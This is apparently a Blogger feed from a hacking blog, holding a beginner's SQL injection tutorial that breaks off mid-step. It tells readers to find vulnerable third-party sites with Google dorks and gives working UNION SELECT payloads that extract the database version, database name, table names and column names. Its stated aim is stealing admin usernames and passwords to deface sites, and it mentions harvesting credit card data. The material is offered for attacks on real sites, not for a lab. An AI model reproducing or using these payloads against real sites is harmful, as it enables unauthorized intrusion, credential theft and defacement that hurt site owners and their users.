<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3436039399135336524</id><updated>2012-02-26T20:59:35.987+06:00</updated><title type='text'>BURN HACKER</title><subtitle type='html'>All About Hacking</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default?start-index=101&amp;max-results=100'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>246</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-9093786057109473557</id><published>2012-02-01T22:51:00.001+06:00</published><updated>2012-02-01T22:51:17.142+06:00</updated><title type='text'>SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;SQL Injection&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Lets start.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;What is SQL Injection?&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Source&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Step 1: Choose Your Target:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Dorks&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;After you have Googled the dorks, click on any site.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232'" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232'&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Step 2: Find the Vulnerable Column&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now that we found our vulnerable site, we will need to find the vulnerable columns.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Add this to the end of the URL:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 1--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 1-- (no error)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 2-- (no error)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 10-- (ERROR!)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 5-- (no error)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;order by 6-- (ERROR!)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,4,5--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Step 3: Obtain Version Number and Database Name&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;That vulnerable column is the ONLY column that we will be editing.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,@@version,5--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,concat(database()),5--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Step 4: Obtain Table Names&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;We are almost done, don't give up just yet.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Edit the code as follows:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;For this tutorial, we will be using the table name of "admin".&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Step 5: View the Columns, and Find the Crucial Shit&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Here comes the fun part :3&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;To find the column names, add this to the end of the URL:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.&lt;/span&gt;&lt;br style="background-color: 